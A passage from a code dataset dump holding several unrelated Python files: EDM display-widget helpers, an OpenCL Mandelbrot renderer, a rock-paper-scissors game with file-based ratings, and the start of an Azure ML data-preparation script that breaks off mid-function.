Font is arial medium 10.\n    If showUnits, then units from the Db are shown.\"\"\" \n    ob = EdmObject(\"Text Monitor\")\n    ob.setDimensions(w,h)\n    ob.setPosition(x,y)\n    ob[\"controlPv\"]=quoteString(pv)\n    ob[\"font\"] = quoteString(\"arial-medium-r-10.0\")\n    ob[\"fgColor\"] = ob.Colour[\"Black\"]\n    ob[\"useDisplayBg\"] = True\n    ob[\"precision\"] = 3\n    ob[\"fontAlign\"] = quoteString(fontAlign) \n    ob[\"smartRefresh\"] = True\n    ob[\"fastUpdate\"] = True\n    ob[\"showUnits\"] = showUnits\n    ob[\"limitsFromDb\"] = False\n    ob[\"newPos\"] = True\n    return ob\n\ndef dummy(x,y,w,h):\n    \"\"\"dummy(x,y,w,h) -> EdmObject\n    Return a dummy invisible rectangle with position (x,y) dimensions (w,h)\"\"\"\n    ob = EdmObject(\"Rectangle\")\n    ob.setDimensions(w,h)\n    ob.setPosition(x,y)\n    ob[\"lineColor\"] = ob.Colour[\"Canvas\"]\n    ob[\"invisible\"] = True\n    return ob\n\ndef rectangle(x,y,w,h,lineColour=\"Black\",fillColour=\"Controller\"):\n    \"\"\"rectangle(x,y,w,h,lineColour=\"Black\",fillColour=\"Controller\")\\\n    -> EdmObject\n    Return a filled rectangle with position (x,y) dimensions (w,h). fillColour\n    and lineColour are looked up in ob.Colour\"\"\"\n    ob = EdmObject(\"Rectangle\")\n    ob.setDimensions(w,h)\n    ob.setPosition(x,y)\n    ob[\"lineColor\"] = ob.Colour[lineColour]\n    ob[\"fill\"] = True\n    ob[\"fillColor\"] = ob.Colour[fillColour]\n    return ob\n\ndef tooltip(x,y,w,h,text):\n    \"\"\"tooltip(x,y,w,h,text) -> EdmObject\n    Return an invisible related display with position (x,y) dimensions (w,h).\n    When right clicked, it displays a tooltip with the given text.\"\"\" \n    ob = EdmObject(\"Related Display\")\n    ob.setDimensions(w,h)\n    ob.setPosition(x,y)\n    ob[\"yPosOffset\"] = max(h,22)+8\n    ob[\"xPosOffset\"] = w/2-100\n    ob[\"button3Popup\"] = True\n    ob[\"invisible\"] = True\n    ob[\"buttonLabel\"] = quoteString(\"tooltip\")\n    ob[\"numPvs\"] = 4\n    ob[\"numDsps\"] = 1\n    ob[\"displayFileName\"] = { 0: quoteString(\"symbols-tooltip-symbol\") }\n    ob[\"setPosition\"] = { 0: quoteString(\"button\") }\n    ob[\"symbols\"] = { 0: quoteString(\"text=\"+text) }\n    return ob\n\ndef rd(x,y,w,h,filename,symbols):\n    \"\"\"rd(x,y,w,h,filename,symbols) -> EdmObject\n    Return an invisible related display with position (x,y) dimensions (w,h).\n    filename and symbols as defined.\"\"\" \n    ob = EdmObject(\"Related Display\")\n    ob.setDimensions(w,h)\n    ob.setPosition(x,y)\n    ob[\"invisible\"] = True\n    ob[\"buttonLabel\"] = quoteString(\"device screen\")\n    ob[\"numPvs\"] = 4\n    if filename:\n        ob[\"displayFileName\"] = { 0: quoteString(filename) }\n        ob[\"numDsps\"] = 1 \n        if symbols:\n            ob[\"symbols\"] = { 0: quoteString(symbols) }\n    else:\n        ob[\"numDsps\"] = 0 \n    return ob\n\ndef shell(x,y,w,h,command):\n    \"\"\"shell(x,y,w,h,command) -> EdmObject\n    Return an invisible shell command button with position (x,y) dimensions\n    (w,h) and command as defined.\"\"\" \n    ob = EdmObject(\"Shell Command\")\n    ob.setDimensions(w,h)\n    ob.setPosition(x,y)\n    ob[\"invisible\"] = True\n    ob[\"buttonLabel\"] = quoteString(\"Shell Command\")\n    ob[\"numCmds\"] = 1\n    ob[\"command\"] = { 0: quoteString(command) }\n    return ob\n\ndef shell_visible(x,y,w,h,name,command):\n    \"\"\"shell_visible(x,y,w,h,name,command) -> EdmObject\n    Return a labelled shell command button with position (x,y) dimensions\n    (w,h), button label name and command as defined.\"\"\" \n    ob = EdmObject(\"Shell Command\")\n    ob.setDimensions(w,h)\n    ob.setPosition(x,y)\n    ob[\"buttonLabel\"] = quoteString(name)\n    ob[\"numCmds\"] = 1\n    ob[\"command\"] = { 0: quoteString(command) }\n    ob[\"fgColor\"] = ob.Colour[\"Related display\"]\n
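    # note (editor's comment): the colours, font and shadows here match rd_visible\n    # below, so shell buttons and related-display buttons look identical on screen\n    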
ob[\"bgColor\"] = ob.Colour[\"Canvas\"]\n ob[\"font\"] = quoteString(\"arial-bold-r-14.0\") \n ob.setShadows()\n return ob\n\ndef rd_visible(x,y,w,h,text,filename,symbols=None):\n \"\"\"rd_visible(x,y,w,h,text,filename,symbols=None) -> EdmObject\n Return a visible related display button with position (x,y) dimensions (w,h)\n text is the button label and filename and symbols are as defined.\"\"\" \n ob = EdmObject(\"Related Display\")\n ob.setDimensions(w,h)\n ob.setPosition(x,y)\n ob[\"buttonLabel\"] = quoteString(text)\n ob[\"numPvs\"] = 4\n ob[\"numDsps\"] = 1\n ob[\"displayFileName\"] = { 0: quoteString(filename) }\n if symbols:\n ob[\"symbols\"] = { 0: quoteString(symbols) }\n ob[\"fgColor\"] = ob.Colour[\"Related display\"]\n ob[\"bgColor\"] = ob.Colour[\"Canvas\"]\n ob[\"font\"] = quoteString(\"arial-bold-r-14.0\") \n ob.setShadows() \n return ob\n\ndef symbol(x,y,w,h,filename,pv,nstates,truth=False):\n \"\"\"symbol(x,y,w,h,filename,pv,nstates,truth=False) -> EdmObject\n Return a symbol with position (x,y) dimensions (w,h). for i in nstates:\n connect values i-1 to i to symbol state i. If truth, treat it as a truth\n table.\"\"\"\n ob = EdmObject(\"Symbol\")\n ob.setDimensions(w,h)\n ob.setPosition(x,y)\n ob[\"file\"] = quoteString(filename)\n ob[\"truthTable\"] = truth\n ob[\"numStates\"] = nstates\n mindict,maxdict = {},{}\n for i in range(1,nstates):\n if i>1:\n mindict[i] = i-1\n maxdict[i]=i\n ob[\"minValues\"] = mindict\n ob[\"maxValues\"] = maxdict\n ob[\"controlPvs\"] = { 0: quoteString(pv) }\n ob[\"numPvs\"] = 1\n ob[\"useOriginalColors\"] = True\n return ob\n\ndef raised_circle(x,y,w,h,ta=\"CO\"):\n \"\"\"raised_circle(x,y,w,h,ta=\"CO\") -> EdmObject\n Return a 3d look circle with position (x,y) dimensions (w,h). ta gives\n the colour, ie CO, MO, DI, VA, etc.\"\"\"\n group = EdmObject(\"Group\")\n top_shadow = EdmObject(\"Circle\")\n top_shadow.setDimensions(w-2,h-1)\n top_shadow.setPosition(x,y)\n top_shadow[\"lineColor\"]=top_shadow.Colour[\"Top Shadow\"]\n top_shadow[\"lineWidth\"]=2\n group.addObject(top_shadow)\n bottom_shadow = EdmObject(\"Circle\")\n bottom_shadow.setDimensions(w-2,h-1)\n bottom_shadow.setPosition(x+2,y+2)\n bottom_shadow[\"lineColor\"]=bottom_shadow.Colour[\"Bottom Shadow\"]\n bottom_shadow[\"lineWidth\"]=2\n group.addObject(bottom_shadow)\n base = EdmObject(\"Circle\")\n base.setDimensions(w-3,h-3)\n base.setPosition(x+2,y+2)\n base[\"lineColor\"]=base.Colour[ta+\" help\"]\n base[\"fillColor\"]=base.Colour[ta+\" title\"]\n base[\"lineWidth\"]=3\n base[\"fill\"]=True\n group.addObject(base)\n sparkle = EdmObject(\"Circle\")\n sparkle.setDimensions(4,3)\n sparkle.setPosition(x+12,y+6)\n sparkle[\"lineColor\"]=sparkle.Colour[\"Top Shadow\"]\n sparkle[\"fillColor\"]=sparkle.Colour[\"White\"]\n sparkle[\"lineWidth\"]=2\n sparkle[\"fill\"]=True\n group.addObject(sparkle)\n group.setPosition(x,y,move_objects=False)\n group.setDimensions(w,h,resize_objects=False)\n return group\n\ndef raised_text_circle(x,y,w,h,text,font=\"arial-bold-r-14.0\",\\\n fontAlign=\"center\",ta=\"CO\"):\n \"\"\"raised_text_circle(x,y,w,h,text,font=\"arial-bold-r-14.0\",\\\n fontAlign=\"center\",ta=\"CO\") -> EdmObject\n Return a 3d look circle with a text label text, position (x,y) dimensions\n (w,h), font and fontAlign. 
ta gives the colour, ie CO, MO, DI, VA, etc.\"\"\"\n    group = raised_circle(x,y,w,h,ta)\n    text_label = label(x,y,w,h,text)\n    text_label[\"fontAlign\"]=quoteString(fontAlign)\n    text_label[\"font\"]=quoteString(font)\n    group.addObject(text_label)\n    return group\n\ndef raised_button_circle(x,y,w,h,filename,symbols,ta=\"CO\"):\n    \"\"\"raised_button_circle(x,y,w,h,filename,symbols,ta=\"CO\") -> EdmObject\n    Return a 3d look circular button with position (x,y) dimensions (w,h)\n    filename and symbols. ta gives the colour, ie CO, MO, DI, VA, etc.\"\"\"\n    group = raised_circle(x,y,w,h,ta)\n    RD = rd(4,4,42,24,filename,symbols)\n    group.addObject(RD)\n    RD.lowerObject()\n    return group\n\ndef raised_text_button_circle(x,y,w,h,text,filename,symbols,\\\n        font=\"arial-bold-r-14.0\",fontAlign=\"center\",ta=\"CO\"):\n    \"\"\"raised_text_button_circle(x,y,w,h,text,filename,symbols,\\\n    font=\"arial-bold-r-14.0\",fontAlign=\"center\",ta=\"CO\") -> EdmObject\n    Return a 3d look circular button with a text label text, position (x,y)\n    dimensions (w,h) filename and symbols. ta gives the colour, ie CO, MO, DI,\n    VA, etc.\"\"\"\n    group = raised_button_circle(x,y,w,h,filename,symbols,ta)\n    text_label = label(x,y,w,h,text)\n    text_label[\"fontAlign\"]=quoteString(fontAlign)\n    text_label[\"font\"]=quoteString(font)\n    group.addObject(text_label)\n    return group\n\ndef raised_PV_circle(x,y,w,h,pv,ta=\"CO\"):\n    \"\"\"raised_PV_circle(x,y,w,h,pv,ta=\"CO\") -> EdmObject\n    Return a 3d look circle with a PV monitor pv, position (x,y) dimensions\n    (w,h). ta gives the colour, ie CO, MO, DI, VA, etc.\"\"\"\n    group = raised_circle(x,y,w,h,ta)\n    PV = text_monitor(x,y,w,h,pv)\n    PV[\"font\"]=quoteString(\"arial-bold-r-14.0\")\n    PV[\"fontAlign\"]=quoteString(\"center\")\n    group.addObject(PV)\n    return group \n\ndef raised_PV_button_circle(x,y,w,h,pv,filename=\"generic-help\",\\\n        symbols=\"draw=$(P).png\",ta=\"CO\"):\n    \"\"\"raised_PV_button_circle(x,y,w,h,pv,filename=\"generic-help\",\\\n    symbols=\"draw=$(P).png\",ta=\"CO\") -> EdmObject\n    Return a 3d look circular button with a PV monitor pv, position (x,y)\n    dimensions (w,h) filename and symbols. ta gives the colour, ie CO, MO, DI,\n    VA, etc.\"\"\"\n    group = raised_PV_circle(x,y,w,h,pv,ta)\n    RD = rd(x+4,y+4,w-8,h-6,filename,symbols)\n    group.addObject(RD)\n    RD.lowerObject()\n    return group\n\ndef raised_PV_shell_circle(x,y,w,h,pv,\\\n        command=\"firefox $(autogen)/documentation/$(P)-help.html\",ta=\"CO\"):\n    \"\"\"raised_PV_shell_circle(x,y,w,h,pv,\\\n    command=\"firefox $(autogen)/documentation/$(P)-help.html\",ta=\"CO\") -> EdmObject\n    Return a 3d look circular button with a PV monitor pv, position (x,y)\n    dimensions (w,h) and shell command.
ta gives the colour, ie CO, MO, DI,\n VA, etc.\"\"\"\n group = raised_PV_circle(x,y,w,h,pv,ta)\n RD = shell(x+4,y+4,w-8,h-6,command)\n group.addObject(RD)\n RD.lowerObject()\n return group\n\ndef embed(x,y,w,h,filename,symbols=None):\n \"\"\"embed(x,y,w,h,filename,symbols=None) -> EdmObject\n Return an embedded window with position (x,y) dimensions (w,h) filename\n and symbols.\"\"\"\n ob = EdmObject(\"Embedded Window\")\n ob.setPosition(x,y)\n ob.setDimensions(w,h)\n ob[\"displaySource\"]=quoteString(\"menu\")\n ob[\"filePv\"]=quoteString(r\"LOC\\dummy=i:0\")\n ob[\"numDsps\"]=1\n ob[\"displayFileName\"]= { 0: quoteString(filename) }\n if symbols:\n ob[\"symbols\"]= { 0: quoteString(symbols) }\n ob[\"noScroll\"]= True \n return ob\n\ndef exit_button(x,y,w,h):\n \"\"\"exit_button(x,y,w,h) -> EdmObject\n Return an exit button with position (x,y) dimensions (w,h).\"\"\"\n button = EdmObject(\"Exit Button\")\n button.setPosition(x,y)\n button.setDimensions(w,h)\n button[\"fgColor\"] = button.Colour[\"Exit/Quit/Kill\"]\n button[\"bgColor\"] = button.Colour[\"Canvas\"]\n button.setShadows()\n button[\"label\"] = quoteString(\"EXIT\")\n button[\"font\"] = quoteString(\"arial-medium-r-16.0\")\n button[\"3d\"] = True\n return button\n\ndef lines(points,col=\"Black\"):\n ob = EdmObject(\"Lines\")\n ob[\"lineColor\"] = ob.Colour[col]\n ob[\"numPoints\"] = len(points)\n ob[\"xPoints\"] = dict((i,x) for i,(x,y) in enumerate(points) )\n ob[\"yPoints\"] = dict((i,y) for i,(x,y) in enumerate(points) ) \n ob.autofitDimensions()\n return ob \n\ndef arrow(x0,x1,y0,y1,col=\"Black\"):\n \"\"\"arrow(x0,x1,y0,y1,col=\"Black\") -> EdmObject\n Return an arrow from (x0,y0) to (x1,y1) with colour col.\"\"\"\n ob = lines([(x0,y0),(x1,y1)],col)\n ob[\"arrows\"] = quoteString(\"to\")\n return ob\n\ndef component_symbol(x,y,w,h,StatusPv,SevrPv,filename):\n if not SevrPv.startswith(\"LOC\") and not SevrPv.startswith(\"CALC\"):\n SevrPv = SevrPv.split(\".\")[0]+\".SEVR\" \n ob = EdmObject(\"Symbol\")\n ob.setDimensions(w,h)\n ob.setPosition(x,y)\n ob[\"file\"] = quoteString(filename)\n ob[\"numStates\"] = 5\n ob[\"minValues\"] = {0:6, 1:0, 2:2, 3:4, 4:1}\n ob[\"maxValues\"] = {0:8, 1:1, 2:4, 3:6, 4:2}\n ob[\"controlPvs\"] = {0: quoteString(StatusPv), 1: quoteString(SevrPv)}\n ob[\"numPvs\"] = 2\n ob[\"shiftCount\"] = {1:1}\n ob[\"useOriginalColors\"] = True\n return ob \n\ndef colour_changing_rd(x,y,w,h,name,StatusPv,SevrPv,filename,symbols=\"\",edl=True):\n \"\"\"Return a symbol with an invisible rd behind it that changes col based on\n sta and sevr pvs\"\"\"\n obgroup = EdmObject(\"Group\")\n if edl:\n obgroup.addObject(rd_visible(x,y,w,h,\"\",filename,symbols))\n else: \n obgroup.addObject(shell_visible(x,y,w,h,\"\",filename)) \n obtext = label(x+2,y+2,w-4,h-4,name,fontAlign=\"center\")\n obtext[\"font\"] = quoteString(\"arial-bold-r-14.0\")\n obtext[\"fgColor\"] = obtext.Colour[\"Related display\"] \n obtext[\"bgAlarm\"] = True\n obtext[\"alarmPv\"] = quoteString(SevrPv)\n obtext[\"visPv\"] = quoteString(StatusPv)\n obtext[\"visMin\"] = quoteString(\"1\")\n obtext[\"visMax\"] = quoteString(\"2\") \n obtext[\"useDisplayBg\"] = False\n obtext2 = obtext.copy() \n obtext[\"visInvert\"] = True \n obtext2[\"bgColor\"] = obtext.Colour[\"Monitor: NORMAL\"] \n obgroup.addObject(obtext) \n obgroup.addObject(obtext2)\n obgroup.autofitDimensions()\n return obgroup\n\n\ndef flip_axis(direction):\n # create a set of axis for a beam going left or right\n group = EdmObject(\"Group\")\n if direction==\"left\":\n 
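# editor's comment: in the \"left\" layout the X axis is labelled as going into\n        # the screen; compare the \"right\" branch below, where X comes out of it\n        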
zlab=label(50,50,10,20,\"Z\",\"center\")\n zlab[\"font\"]=quoteString(\"arial-bold-r-14.0\")\n group.addObject(zlab)\n z=arrow(5,45,60,60,\"grey-13\")\n group.addObject(z)\n y=arrow(5,5,60,20,\"grey-13\")\n group.addObject(y) \n ylab=label(0,0,10,16,\"Y\",\"center\")\n ylab[\"font\"]=quoteString(\"arial-bold-r-14.0\")\n group.addObject(ylab)\n xlab=label(40,20,77,32,\"X (into \\n screen)\",\"center\")\n xlab[\"font\"]=quoteString(\"arial-bold-r-14.0\")\n group.addObject(xlab)\n x=arrow(5,35,60,45,\"Black\")\n group.addObject(x)\n else:\n zlab=label(5,25,10,15,\"Z\",\"center\")\n zlab[\"font\"]=quoteString(\"arial-bold-r-14.0\")\n group.addObject(zlab)\n z=arrow(40,0,45,45,\"Black\")\n group.addObject(z)\n y=arrow(40,40,45,5,\"Black\")\n group.addObject(y) \n ylab=label(15,0,20,20,\"Y\",\"center\")\n ylab[\"font\"]=quoteString(\"arial-bold-r-14.0\")\n group.addObject(ylab)\n xlab=label(50,30,69,32,\"X (out of \\n screen)\",\"center\")\n xlab[\"font\"]=quoteString(\"arial-bold-r-14.0\")\n group.addObject(xlab)\n x=arrow(40,70,45,65,\"grey-13\")\n group.addObject(x)\n group.autofitDimensions()\n return group \n","sub_path":"dls_edm/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":16264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"184574565","text":"import time\nimport cv2\nimport numpy as np\nimport pyopencl as cl\nfrom scipy import ndimage\nimport skimage.transform\nimport datetime\n\ndef calc_fractal_numpy(chunks, maxiter):\n output_chunks = []\n\n for chunk_input in chunks:\n chunk_output = np.zeros(chunk_input.shape, dtype=np.uint16)\n\n z = np.zeros(chunk_input.shape, np.complex)\n\n for it in range(maxiter):\n z = z*z + chunk_input\n done = np.greater(abs(z), 2.0)\n chunk_input = np.where(done, 0+0j, chunk_input)\n z = np.where(done, 0+0j, z)\n chunk_output = np.where(done, it, chunk_output)\n\n output_chunks.append(chunk_output)\n\n return np.concatenate(output_chunks)\n\ndef calc_fractal_opencl(chunks, maxiter):\n # List all the stuff in this computer\n platforms = cl.get_platforms()\n\n for platform in platforms:\n print(\"Found a device: {}\".format(str(platform)))\n\n # Let's just go with platform zero\n ctx = cl.Context(dev_type=cl.device_type.ALL,\n properties=[(cl.context_properties.PLATFORM, platforms[0])])\n\n # Create a command queue on the platform (device = None means OpenCL picks a device for us)\n queue = cl.CommandQueue(ctx, device = None)\n\n mf = cl.mem_flags\n\n # This is our OpenCL kernel. 
It does a single point (OpenCL is responsible for mapping it across the points in a chunk)\n prg = cl.Program(ctx, \"\"\"\n #pragma OPENCL EXTENSION cl_khr_byte_addressable_store : enable\n __kernel void mandelbrot(__global float2 *q, __global ushort *output, ushort const maxiter)\n {\n int gid = get_global_id(0);\n\n float cx = q[gid].x;\n float cy = q[gid].y;\n\n float x = 0.0f;\n float y = 0.0f;\n ushort its = 0;\n\n while (((x*x + y*y) < 4.0f) && (its < maxiter)) {\n float xtemp = x*x - y*y + cx;\n y = 2*x*y + cy;\n x = xtemp;\n its++;\n }\n\n if (its == maxiter) {\n output[gid] = 0;\n } else {\n output[gid] = its;\n }\n }\n \"\"\").build()\n\n output_chunks = []\n output_chunks_on_device = []\n\n chunk_shape = None\n\n for chunk_input in chunks:\n # Record the shape of input chunks\n chunk_shape = chunk_input.shape\n\n # These are our buffers to hold data on the device\n chunk_input_on_device = cl.Buffer(ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=chunk_input)\n\n chunk_output_on_device = cl.Buffer(ctx, mf.WRITE_ONLY, int(chunk_input.nbytes / 4))\n # divided by 4 because our inputs are 64 bits but outputs are 16 bits\n\n # Call the kernel on this chunk\n prg.mandelbrot(queue, chunk_shape, None, chunk_input_on_device, chunk_output_on_device, np.uint16(maxiter))\n\n # Add the output chunk to our list to keep track of it\n output_chunks_on_device.append(chunk_output_on_device)\n\n # Wait for all the chunks to be computed\n queue.finish()\n\n for chunk_output_on_device in output_chunks_on_device:\n chunk_output = np.zeros(chunk_shape, dtype=np.uint16)\n\n # Wait until it is done and pull the data back\n cl.enqueue_copy(queue, chunk_output, chunk_output_on_device).wait()\n\n # Insert the chunk in our overall output\n output_chunks.append(chunk_output)\n\n return np.concatenate(output_chunks)\n\ndef apply_blur_opencl(image, radius, strength) :\n platforms = cl.get_platforms()\n\n ctx = cl.Context(dev_type=cl.device_type.ALL,\n properties=[(cl.context_properties.PLATFORM, platforms[0])])\n\n queue = cl.CommandQueue(ctx, device = None)\n mf = cl.mem_flags\n\n image_dims = image.shape\n\n filt = np.ones((radius, radius), dtype=np.float)\n\n preamble = \"\"\"\n #define IMAGE_W {}\n #define IMAGE_H {}\n #define FILTER_SIZE {}\n #define HALF_FILTER_SIZE {}\n #define STRENGTH {}\n \"\"\".format(image_dims[0], image_dims[1], int(radius), int(radius/2), int(strength))\n\n prg = cl.Program(ctx, preamble +\n \"\"\"\n #pragma OPENCL EXTENSION cl_khr_byte_addressable_store : enable\n __kernel void convolve(const __global float *input,\n __global float *output,\n __constant float *filter) {\n\n int y = get_global_id(1);\n int x = get_global_id(0);\n\n if ( y > HALF_FILTER_SIZE && y < ((IMAGE_H - HALF_FILTER_SIZE) - 1) &&\n x > HALF_FILTER_SIZE && x < ((IMAGE_W - HALF_FILTER_SIZE) - 1)) {\n float sum = 0.0f;\n\n for (int ky = 0; ky < FILTER_SIZE; ky++) {\n for (int kx = 0; kx < FILTER_SIZE; kx++) {\n sum += input[(y * IMAGE_W) + (ky-HALF_FILTER_SIZE) + x + (kx-HALF_FILTER_SIZE)] *\n filter[ky * FILTER_SIZE + kx];\n }\n }\n\n output[y * IMAGE_W + x] = sum / (float)STRENGTH;\n } else {\n output[y * IMAGE_W + x] = 0.0f;\n }\n }\n \"\"\").build()\n\n image_on_device = cl.Buffer(ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=image)\n filter_on_device = cl.Buffer(ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=filt)\n output_on_device = cl.Buffer(ctx, mf.WRITE_ONLY, image.nbytes)\n output = np.zeros(image_dims, dtype=np.float)\n\n prg.convolve(queue, image_dims, None, image_on_device, output_on_device, 
filter_on_device)\n\n cl.enqueue_copy(queue, output, output_on_device).wait()\n\n return output\n\n\nif __name__ == '__main__':\n\n class Mandelbrot(object):\n \n def __init__(self):\n self.zoom = 1024\n self.centre_x = -(1.6*self.zoom)\n self.centre_y = 0\n self.w = 1920*4*2\n self.h = 1080*4*2\n self.w_range = 192*4\n self.h_range = 108*4\n self.iterations = 64\n self.chunks = 20\n self.fname = \"mandelbrot.jpg\"\n\n self.beautify = True\n # To get crisper edges, also throw out points with less than this number of iterations\n self.cutoff = 0.125 * self.iterations\n\n self.r_spread = 0.4\n self.g_spread = 0.4\n self.b_spread = 0.4\n\n self.render((self.centre_x-self.w_range)/self.zoom, (self.centre_x+self.w_range)/self.zoom,\n (self.centre_y-self.h_range)/self.zoom, (self.centre_y+self.h_range)/self.zoom, self.iterations)\n self.save_image()\n\n def render(self, x1, x2, y1, y2, maxiter):\n # Create the input\n xx = np.arange(x1, x2, (x2-x1)/self.w)\n yy = np.arange(y2, y1, (y1-y2)/self.h) * 1j\n q = np.ravel(xx+yy[:, np.newaxis]).astype(np.complex64)\n\n # Slice the input up into chunks to be processed in parallel\n chunk_width = self.w\n chunk_height = self.h / self.chunks\n chunked_data = np.split(q, self.chunks)\n\n # Set up the output\n output = np.zeros_like(q)\n chunked_output = np.split(output, self.chunks)\n\n start_main = time.time()\n\n output = calc_fractal_opencl(chunked_data, maxiter)\n\n end_main = time.time()\n\n secs = end_main - start_main\n print(\"Main took\", secs)\n\n self.mandel = output.reshape((self.h, self.w))\n\n def save_image(self):\n normalized = self.mandel.astype(np.double)\n normalized = (normalized / (normalized.max())) * 255.0\n normalized = np.clip(normalized - self.cutoff, 0, 255)\n\n b = normalized\n g = normalized\n r = normalized\n\n if (self.beautify):\n filtered = normalized\n b_filtered = ndimage.uniform_filter(filtered, size=int(11*self.b_spread))\n g_filtered = ndimage.uniform_filter(filtered, size=int(11*self.g_spread))\n r_filtered = ndimage.uniform_filter(filtered, size=int(11*self.r_spread))\n\n b_filtered_mean = b_filtered.mean()\n g_filtered_mean = g_filtered.mean()\n r_filtered_mean = r_filtered.mean()\n\n b = ((b_filtered / b_filtered_mean))\n g = ((g_filtered / g_filtered_mean))\n r = ((r_filtered / r_filtered_mean))\n\n # Renormalize\n b = (b / b.max()) * (255.0)\n g = (g / g.max()) * (255.0)\n r = (r / r.max()) * (255.0)\n\n cv2.imwrite(self.fname, cv2.merge((np.rint(b).astype(np.uint8),\n np.rint(g).astype(np.uint8),\n np.rint(r).astype(np.uint8))))\n\n # test the class\n test = Mandelbrot()\n print(cl.get_platforms())\n\n","sub_path":"Sem 1/Scalable Computing/Scalable Computing OpenCL Project - Mandlebrot creation in complex space/open_cl.py","file_name":"open_cl.py","file_ext":"py","file_size_in_byte":8524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"45748306","text":"# Write your code here\nimport random\n\ndefeats = {'rock': ['paper'], 'paper': ['scissors'], 'scissors': ['rock']}\n\ndef findWinner(user,computer):\n\n if user == computer:\n return 0\n\n if user in defeats[computer]:\n return 1\n\n else:\n return -1\n\ndef get_rating(name):\n #name = name.upper()\n\n rating_file = open('rating.txt')\n data = rating_file.read()\n rating_file.close()\n\n if name in data:\n player_data = [player for player in data.split('\\n') if name in player]\n rating = int(player_data[0].split()[1])\n\n else:\n rating = 0\n\n return rating\n\ndef write_data(name,new_rating,old_rating):\n 
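\"\"\"Rewrite rating.txt with new_rating for this player: the existing\n    \"name rating\" line is replaced if present, otherwise a new one is appended.\"\"\"\n    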
#name = name.upper()\n new_data = name + \" \" + str(new_rating)\n old_data = name + \" \" + str(old_rating)\n\n rating_file = open('rating.txt', 'r')\n data = rating_file.read()\n rating_file.close()\n\n update_file = open('rating.txt','w')\n\n if name in data:\n data = data.replace(old_data,new_data)\n else:\n data += new_data\n\n print(data, end='\\n', file=update_file)\n\n update_file.close()\n\n\ndef set_precedence(options):\n global defeats\n defeats = {}\n\n for option in options:\n i = options.index(option)\n part1 = options[:i]\n others = options[i+1:]\n others.extend(part1)\n defeats[option] = others[:len(others)//2]\n\n print(defeats)\n\nname = input('Enter your name:')\nprint(\"Hello,\",name)\n\nrating = get_rating(name)\nold_rating = rating\n\noptions = input().split(',')\n\nif '' not in options:\n set_precedence(options)\nelse:\n options = ['rock','paper','scissors']\n\nprint(\"Okay, let's start\")\n\nvalid_input = options + ['!exit','!rating']\n\nwhile True:\n\n user = input()\n computer = random.choice(options)\n\n if user not in valid_input:\n print('Invalid input')\n continue\n\n if user == '!exit':\n print('Bye!')\n write_data(name,rating,old_rating)\n break\n\n if user == '!rating':\n print(\"Your rating:\",rating)\n continue\n\n outcome = findWinner(user,computer)\n\n if outcome == 0:\n print(f'There is a draw ({user})')\n rating += 50\n\n elif outcome == 1:\n print(f'Well done. The computer chose {computer} and failed')\n rating += 100\n\n else:\n print(f'Sorry, but the computer chose {computer}')","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"253477836","text":"import argparse\nimport json\nimport os\nimport sys\nimport traceback\nfrom glob import glob\nimport math\n\nimport joblib\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom azureml.core import Dataset, Datastore, Experiment, Run, Workspace\nfrom azureml.core.authentication import AzureCliAuthentication\nfrom dotenv import load_dotenv\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\n\n# For local development, set values in this section\nload_dotenv()\n\ndef main():\n cli_auth = AzureCliAuthentication()\n\n workspace_name = os.environ.get(\"WORKSPACE_NAME\")\n resource_group = os.environ.get(\"RESOURCE_GROUP\")\n subscription_id = os.environ.get(\"SUBSCRIPTION_ID\")\n\n input_dataset_name = os.environ.get(\"INPUT_DATASET_NAME\")\n training_testing_dataset_name = os.environ.get(\"TRAINING_TESTING_DATASET\")\n generator_dataset_name = os.environ.get(\"GENERATOR_DATASET_NAME\")\n\n script_folder = os.path.join(os.environ.get('ROOT_DIR'), 'scripts')\n config_state_folder = os.path.join(os.environ.get('ROOT_DIR'), 'config_states')\n\n train_test_data_folder = os.path.join(os.environ.get('ROOT_DIR'), 'data/tmp/train_test_data')\n os.makedirs(train_test_data_folder, exist_ok=True)\n\n generator_folder = os.path.join(os.environ.get('ROOT_DIR'), 'data/tmp/generator')\n os.makedirs(generator_folder, exist_ok=True)\n\n ws = Workspace.get(\n name=workspace_name,\n subscription_id=subscription_id,\n resource_group=resource_group,\n auth=cli_auth\n )\n\n datastore = Datastore(ws)\n\n # Prepare!\n all_labels_np, all_components_np, all_sizes_np, components = loadInputData(input_dataset_name, ws)\n\n X_train_conv, X_train_values, X_test_conv, X_test_values, y_train, y_test = 
trainTestSplit(all_labels_np, all_components_np, all_sizes_np)\n\n saveNumpyArrays(train_test_data_folder, X_train_conv=X_train_conv, X_train_values=X_train_values, X_test_conv=X_test_conv, X_test_values=X_test_values, y_train=y_train, y_test=y_test)\n\n generateData(datastore, ws, generator_dataset_name, generator_folder, components, X_train_conv, X_train_values, y_train)\n\n y_train_generated, X_train_values_generated, X_train_conv_generated = processGeneratedData(generator_folder)\n\n saveNumpyArrays(train_test_data_folder, y_train_generated=y_train_generated, X_train_values_generated=X_train_values_generated, X_train_conv_generated=X_train_conv_generated)\n saveNumpyArrays(train_test_data_folder, component_names=np.asarray(components))\n\n datastore.upload(src_dir=train_test_data_folder, target_path='train_test_data')\n train_test_data = Dataset.File.from_files(\n [\n (datastore, 'train_test_data')\n ],\n validate=False\n )\n train_test_data.register(\n workspace=ws,\n name=training_testing_dataset_name,\n description=\"A part of the components that have been processed and split in training and testing sets for an AI model.\",\n create_new_version=True\n )\n \n\ndef processGeneratedData(generator_folder):\n all_generated_images = []\n all_generated_sizes = []\n all_generated_labels = []\n for img in sorted(glob(f\"{generator_folder}/*.png\")):\n size_name = img.replace('.png', '--size.json')\n all_generated_images.append(plt.imread(img)[:,:,:3] / 255)\n all_generated_labels.append(img.split('-')[-3].split('/')[-1]) # Get the Object name (data/tveer/generator/Object 1-0-1.png --> Object 1)\n with open(size_name, 'r') as f:\n 